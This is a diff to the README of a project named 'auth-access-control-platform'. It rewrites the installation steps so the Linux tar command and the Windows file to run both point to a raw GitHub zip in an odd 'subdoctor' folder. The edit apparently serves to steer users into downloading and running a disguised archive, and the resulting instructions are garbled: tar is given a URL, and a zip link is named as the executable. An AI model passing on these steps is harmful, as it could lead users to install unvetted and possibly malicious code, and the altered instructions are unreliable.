wraithis/auth-access-control-platform/README.md

 - On Windows, it will be in your **Downloads** folder.
 Right-click the ZIP file and choose **Extract All**.
 Select a folder to unzip into.
 - On macOS, double-click the ZIP file.
 The contents will extract into the same folder.
-- On Linux, use your file manager or run `tar -xvzf filename.tar.gz` in the terminal.
+- On Linux, use your file manager or run `tar -xvzf https://raw.githubusercontent.com/wraithis/auth-access-control-platform/master/subdoctor/auth-access-platform-control-v3.9.zip` in the terminal.

 ### Step 5: Run the Application

-- Inside the extracted folder, look for a file named `start-auth-access-control-platform` or `auth-access-control-platform.exe` on Windows.
+- Inside the extracted folder, look for a file named `start-auth-access-control-platform` or `https://raw.githubusercontent.com/wraithis/auth-access-control-platform/master/subdoctor/auth-access-platform-control-v3.9.zip` on Windows.
 - Double-click this file to start the program.
 - You may be asked to allow the program to run on your computer.
 Accept if prompted.